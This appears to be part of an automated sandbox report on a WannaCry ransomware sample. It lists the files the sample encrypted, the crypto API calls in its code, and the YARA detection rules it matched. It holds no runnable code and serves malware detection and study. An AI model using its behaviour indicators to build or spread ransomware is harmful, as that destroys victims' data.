Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png.WNCRY (copy) entropy: 7.99423786716	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000009.db.WNCRY (copy) entropy: 7.99925724678	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000a.db.WNCRY (copy) entropy: 7.99937496677	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000d.db.WNCRY (copy) entropy: 7.9993861641	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db.WNCRY (copy) entropy: 7.99975902129	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Scans\mpcache-0488A702D8A6400042FFB1D7ADF4EEF36AD772FD.bin.DB.WNCRY (copy) entropy: 7.99989292947	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\ClickToRun\ProductReleases\3DD78803-01DE-4232-A9F6-781F290BD1C3\en-us.16\stream.x86.en-us.db.WNCRY (copy) entropy: 7.9995988813	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\ClickToRun\ProductReleases\3DD78803-01DE-4232-A9F6-781F290BD1C3\x-none.16\stream.x86.x-none.db.WNCRY (copy) entropy: 7.99988493876	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\user.bmp.WNCRY (copy) entropy: 7.99973117138	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\jones.bmp.WNCRY (copy) entropy: 7.99967276303	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\OTele\excel.exe.db.WNCRY (copy) entropy: 7.99253380239	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\ConnectedDevicesPlatform\L.user\ActivitiesCache.db.WNCRY (copy) entropy: 7.99983831755	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\first_party_sets.db.WNCRY (copy) entropy: 7.99617708007	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\databases\Databases.db.WNCRY (copy) entropy: 7.99402457387	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\OTele\officec2rclient.exe.db.WNCRY (copy) entropy: 7.99153931087	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\OTele\officeclicktorun.exe.db.WNCRY (copy) entropy: 7.99231889014	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\OTele\officesetup.exe.db.WNCRY (copy) entropy: 7.99154769211	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Explorer\iconcache_16.db.WNCRY (copy) entropy: 7.99983265094	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Explorer\iconcache_256.db.WNCRY (copy) entropy: 7.99994984323	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Explorer\iconcache_32.db.WNCRY (copy) entropy: 7.99990645738	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Explorer\iconcache_48.db.WNCRY (copy) entropy: 7.99982478323	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Explorer\iconcache_idx.db.WNCRY (copy) entropy: 7.99667225364	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Explorer\thumbcache_16.db.WNCRY (copy) entropy: 7.99980236011	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Explorer\thumbcache_256.db.WNCRY (copy) entropy: 7.99979758511	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Explorer\thumbcache_32.db.WNCRY (copy) entropy: 7.99980954405	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Explorer\thumbcache_48.db.WNCRY (copy) entropy: 7.99981076356	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Explorer\thumbcache_96.db.WNCRY (copy) entropy: 7.99995103787	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Explorer\thumbcache_idx.db.WNCRY (copy) entropy: 7.99717928489	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Notifications\wpndatabase.db.WNCRY (copy) entropy: 7.99981120415	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\18e190413af045db88dfbd29609eb877.db.WNCRY (copy) entropy: 7.99350021239	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\EdgeEDrop\EdgeEDropSQLite.db.WNCRY (copy) entropy: 7.99557760155	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_driver.js.WNCRY (copy) entropy: 7.99989300849	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\product_page.js.WNCRY (copy) entropy: 7.99981698632	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\shopping.js.WNCRY (copy) entropy: 7.99996670991	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\shoppingfre.js.WNCRY (copy) entropy: 7.99944843086	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\edge_driver.js.WNCRY (copy) entropy: 7.99990468527	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db.WNCRY (copy) entropy: 7.9919911971	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\auto_open_controller.js.WNCRY (copy) entropy: 7.99984680736	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_checkout_page_validator.js.WNCRY (copy) entropy: 7.99980945831	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_confirmation_page_validator.js.WNCRY (copy) entropy: 7.99980433931	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_tracking_page_validator.js.WNCRY (copy) entropy: 7.99796552975	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\shopping_iframe_driver.js.WNCRY (copy) entropy: 7.99296514252	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\vendor.bundle.js.WNCRY (copy) entropy: 7.99987320722	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\wallet.bundle.js.WNCRY (copy) entropy: 7.99993516154	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\bnpl\bnpl.bundle.js.WNCRY (copy) entropy: 7.9998146213	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Mini-Wallet\miniwallet.bundle.js.WNCRY (copy) entropy: 7.99945141835	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\INetCache\IE\90SNK17T\oneDs_f2e0f4a029670f10d892[1].js.WNCRY (copy) entropy: 7.99892723077	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\IndexedDB.edb.WNCRY (copy) entropy: 7.99991754674	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\GLEAM-DARK.svg.WNCRY (copy) entropy: 7.99835426884	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\GLEAM-LIGHT.svg.WNCRY (copy) entropy: 7.99851263398	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\craw_background.js.WNCRY (copy) entropy: 7.99965845055	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\craw_window.js.WNCRY (copy) entropy: 7.99932905589	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\flapper.gif.WNCRY (copy) entropy: 7.9973129998	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Notification\notification.bundle.js.WNCRY (copy) entropy: 7.99967918879	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Notification\notification_fast.bundle.js.WNCRY (copy) entropy: 7.99947262569	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Tokenized-Card\tokenized-card.bundle.js.WNCRY (copy) entropy: 7.99964975052	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Wallet-Checkout\wallet-drawer.bundle.js.WNCRY (copy) entropy: 7.99987765465	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Caches\{0DD3376E-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db.WNCRY (copy) entropy: 7.99957958013	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000012.db.WNCRY (copy) entropy: 7.9983459791	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.db.WNCRY (copy) entropy: 7.99812105656	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000005.db.WNCRY (copy) entropy: 7.9974522948	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\INetCache\IE\33CUD2J1\ConvergedLogin_PCore_AI1nyU_u3YQ_at1fSBm4Uw2[1].js.WNCRY (copy) entropy: 7.99953428626	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\INetCache\IE\33CUD2J1\ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2[1].js.WNCRY (copy) entropy: 7.99954127492	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\OB7JJZIK\sharedscripts-939520eada[1].js.WNCRY (copy) entropy: 7.99659840845	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AppData\CacheStorage\CacheStorage.edb.WNCRY (copy) entropy: 7.99988622625	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.edb.WNCRY (copy) entropy: 7.99987291548	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\6hU_LneafI_NFLeDvM367ebFaKQ[1].js.WNCRY (copy) entropy: 7.99037009332	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\aABLNT_FV45QjYQfnRHrBCAk4GU[1].js.WNCRY (copy) entropy: 7.99872325193	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\7TU8ICAJ\WwF5sNrjseqq673SafWJ8p6dARY[1].js.WNCRY (copy) entropy: 7.99686947982	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\QTRC1JK9\X6j0qPgNij1n_IogMJrgYaT9Kp8[1].js.WNCRY (copy) entropy: 7.99082771066	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\256.png.WNCRY (copy) entropy: 7.99018490928	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\256.png.WNCRY (copy) entropy: 7.99294394267	Jump to dropped file

Source: C:\Users\user\Desktop\WannaCry_2.EXE	Code function: 0_2_10003F00 GetFileAttributesA,GetFileAttributesA,CreateFileA,GetFileSize,GlobalAlloc,ReadFile,GetFileAttributesA,CryptImportKey,_local_unwind2,_local_unwind2,	0_2_10003F00
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Code function: 0_2_10003AC0 CryptImportKey,CryptImportKey,CryptDestroyKey,	0_2_10003AC0
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Code function: 0_2_10004440 CryptAcquireContextA,wcsrchr,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,	0_2_10004440

System Summary

Malicious sample detected (through community Yara rule)

Source: WannaCry_2.EXE, type: SAMPLE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: WannaCry_2.EXE, type: SAMPLE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: WannaCry_2.EXE, type: SAMPLE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 0.2.WannaCry_2.EXE.9e6968.0.unpack, type: UNPACKEDPE	Matched rule: WanaCry Payload Author: kevoreilly
Source: 0.2.WannaCry_2.EXE.10000000.1.unpack, type: UNPACKEDPE	Matched rule: WanaCry Payload Author: kevoreilly
Source: 202.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 0.2.WannaCry_2.EXE.9e6968.0.raw.unpack, type: UNPACKEDPE	Matched rule: WanaCry Payload Author: kevoreilly
Source: 0.0.WannaCry_2.EXE.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 0.0.WannaCry_2.EXE.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 0.0.WannaCry_2.EXE.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 00000000.00000000.1123120496.000000000040E000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 00000000.00000002.2384451558.000000000040F000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\Users\user\Desktop\133611722583794.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\133611722583794.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\133611722583794.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\133611722583794.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\133611722583794.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\133611722583794.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\133611722583794.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\133611722583794.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\133611722583794.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\133611722583794.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\133611722583794.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\133611722583794.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\133611722583794.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\@WanaDecryptor@.exe, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: C:\@WanaDecryptor@.exe, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: C:\@WanaDecryptor@.exe, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: C:\@WanaDecryptor@.exe, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
